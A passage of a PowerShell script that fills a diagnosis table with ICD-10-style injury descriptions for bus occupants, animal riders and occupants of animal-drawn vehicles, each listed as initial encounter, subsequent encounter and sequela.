traffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of bus injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in nontraffic accident","Driver of bus injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in nontraffic accident","Driver of bus injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in nontraffic accident","Driver of bus injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in nontraffic accident","Passenger on bus injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in nontraffic accident","Passenger on bus injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in nontraffic accident","Passenger on bus injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident","Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident","Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident","Person on outside of bus injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with fixed or stationary object","Person boarding or alighting from bus injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with fixed or stationary object","Person boarding or alighting from bus injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with fixed or stationary object","Person boarding or alighting from bus injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in traffic accident","Driver of bus injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in traffic accident","Driver of bus injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with fixed or stationary object in traffic accident","Driver of bus injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in traffic accident","Passenger on bus injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in traffic accident","Passenger on bus injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with fixed or stationary object in traffic accident","Passenger on bus injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in traffic accident","Person on outside of bus injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in traffic accident","Person on outside of bus injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with fixed or stationary object in traffic accident","Person on outside of bus injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of bus injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in nontraffic accident","Driver of bus injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in nontraffic accident","Driver of bus injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in nontraffic accident","Driver of bus injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in nontraffic accident","Passenger on bus injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in nontraffic accident","Passenger on bus injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in nontraffic accident","Passenger on bus injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in nontraffic accident","Person on outside of bus injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in nontraffic accident","Person on outside of bus injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in nontraffic accident","Person on outside of bus injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident","Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident","Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident","Unspecified occupant of bus injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in noncollision transport accident","Person boarding or alighting from bus injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in noncollision transport accident","Person boarding or alighting from bus injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in noncollision transport accident","Person boarding or alighting from bus injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in traffic accident","Driver of bus injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in traffic accident","Driver of bus injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in noncollision transport accident in traffic accident","Driver of bus injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in traffic accident","Passenger on bus injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in traffic accident","Passenger on bus injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in noncollision transport accident in traffic accident","Passenger on bus injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in traffic accident","Person on outside of bus injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in traffic accident","Person on outside of bus injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in noncollision transport accident in traffic accident","Person on outside of bus injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in traffic accident","Unspecified occupant of bus injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in traffic accident","Unspecified occupant of bus injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in noncollision transport accident in traffic accident","Unspecified occupant of bus injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident","Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident","Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident","Driver of bus injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in nontraffic accident","Driver of bus injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in nontraffic accident","Driver of bus injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in nontraffic accident","Driver of bus injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident","Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident","Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident","Passenger on bus injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in nontraffic accident","Passenger on bus injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in nontraffic accident","Passenger on bus injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in nontraffic accident","Passenger on bus injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified bus occupant injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified nontraffic accident","Bus occupant (driver) (passenger) injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified nontraffic accident","Bus occupant (driver) (passenger) injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified nontraffic accident","Bus occupant (driver) (passenger) injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in traffic accident","Driver of bus injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in traffic accident","Driver of bus injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with unspecified motor vehicles in traffic accident","Driver of bus injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in traffic accident","Driver of bus injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in traffic accident","Driver of bus injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with other motor vehicles in traffic accident","Driver of bus injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in traffic accident","Passenger on bus injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in traffic accident","Passenger on bus injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with unspecified motor vehicles in traffic accident","Passenger on bus injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in traffic accident","Passenger on bus injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in traffic accident","Passenger on bus injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with other motor vehicles in traffic accident","Passenger on bus injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified bus occupant injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in traffic accident","Unspecified bus occupant injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in traffic accident","Unspecified bus occupant injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified bus occupant injured in collision with other motor vehicles in traffic accident","Unspecified bus occupant injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in transport accidents with military vehicle","Bus occupant (driver) (passenger) injured in transport accidents with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in transport accidents with military vehicle","Bus occupant (driver) (passenger) injured in transport accidents with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in transport accidents with military vehicle","Bus occupant (driver) (passenger) injured in transport accidents with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in other specified transport accidents","Bus occupant (driver) (passenger) injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in other specified transport accidents","Bus occupant (driver) (passenger) injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in other specified transport accidents","Bus occupant (driver) (passenger) injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified traffic accident","Bus occupant (driver) (passenger) injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified traffic accident","Bus occupant (driver) (passenger) injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bus occupant (driver) (passenger) injured in unspecified traffic accident","Bus occupant (driver) (passenger) injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from horse in noncollision accident","Animal-rider injured by fall from or being thrown from horse in noncollision accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from horse in noncollision accident","Animal-rider injured by fall from or being thrown from horse in noncollision accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from horse in noncollision accident","Animal-rider injured by fall from or being thrown from horse in noncollision accident, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from other animal in noncollision accident","Animal-rider injured by fall from or being thrown from other animal in noncollision accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from other animal in noncollision accident","Animal-rider injured by fall from or being thrown from other animal in noncollision accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured by fall from or being thrown from other animal in noncollision accident","Animal-rider injured by fall from or being thrown from other animal in noncollision accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident","Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident","Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident","Occupant of animal-drawn vehicle injured by fall from or being thrown from animal-drawn vehicle in noncollision accident, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedestrian or animal","Animal-rider injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedestrian or animal","Animal-rider injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedestrian or animal","Animal-rider injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedestrian or animal","Occupant of animal-drawn vehicle injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedestrian or animal","Occupant of animal-drawn vehicle injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedestrian or animal","Occupant of animal-drawn vehicle injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedal cycle","Animal-rider injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedal cycle","Animal-rider injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with pedal cycle","Animal-rider injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedal cycle","Occupant of animal-drawn vehicle injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedal cycle","Occupant of animal-drawn vehicle injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with pedal cycle","Occupant of animal-drawn vehicle injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with two- or three-wheeled motor vehicle","Animal-rider injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with two- or three-wheeled motor vehicle","Animal-rider injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with two- or three-wheeled motor vehicle","Animal-rider injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle","Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle","Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle","Occupant of animal-drawn vehicle injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Animal-rider injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus","Occupant of animal-drawn vehicle injured in collision with car, pick-up truck, van, heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other specified motor vehicle","Animal-rider injured in collision with other specified motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other specified motor vehicle","Animal-rider injured in collision with other specified motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other specified motor vehicle","Animal-rider injured in collision with other specified motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle","Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle","Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle","Occupant of animal-drawn vehicle injured in collision with other specified motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with railway train or railway vehicle","Animal-rider injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with railway train or railway vehicle","Animal-rider injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with railway train or railway vehicle","Animal-rider injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle","Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle","Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle","Occupant of animal-drawn vehicle injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other animal being ridden","Animal-rider injured in collision with other animal being ridden, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other animal being ridden","Animal-rider injured in collision with other animal being ridden, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other animal being ridden","Animal-rider injured in collision with other animal being ridden, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with animal being ridden","Occupant of animal-drawn vehicle injured in collision with animal being ridden, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with animal being ridden","Occupant of animal-drawn vehicle injured in collision with animal being ridden, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with animal being ridden","Occupant of animal-drawn vehicle injured in collision with animal being ridden, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with animal-drawn vehicle","Animal-rider injured in collision with animal-drawn vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with animal-drawn vehicle","Animal-rider injured in collision with animal-drawn vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with animal-drawn vehicle","Animal-rider injured in collision with animal-drawn vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle","Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle","Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle","Occupant of animal-drawn vehicle injured in collision with other animal-drawn vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with streetcar","Animal-rider injured in collision with streetcar, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with streetcar","Animal-rider injured in collision with streetcar, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with streetcar","Animal-rider injured in collision with streetcar, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with streetcar","Occupant of animal-drawn vehicle injured in collision with streetcar, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with streetcar","Occupant of animal-drawn vehicle injured in collision with streetcar, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with streetcar","Occupant of animal-drawn vehicle injured in collision with streetcar, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other nonmotor vehicles","Animal-rider injured in collision with other nonmotor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other nonmotor vehicles","Animal-rider injured in collision with other nonmotor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with other nonmotor vehicles","Animal-rider injured in collision with other nonmotor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles","Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles","Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles","Occupant of animal-drawn vehicle injured in collision with other nonmotor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with fixed or stationary object","Animal-rider injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with fixed or stationary object","Animal-rider injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in collision with fixed or stationary object","Animal-rider injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with fixed or stationary object","Occupant of animal-drawn vehicle injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with fixed or stationary object","Occupant of animal-drawn vehicle injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in collision with fixed or stationary object","Occupant of animal-drawn vehicle injured in collision with fixed or stationary object, sequela") + $null = 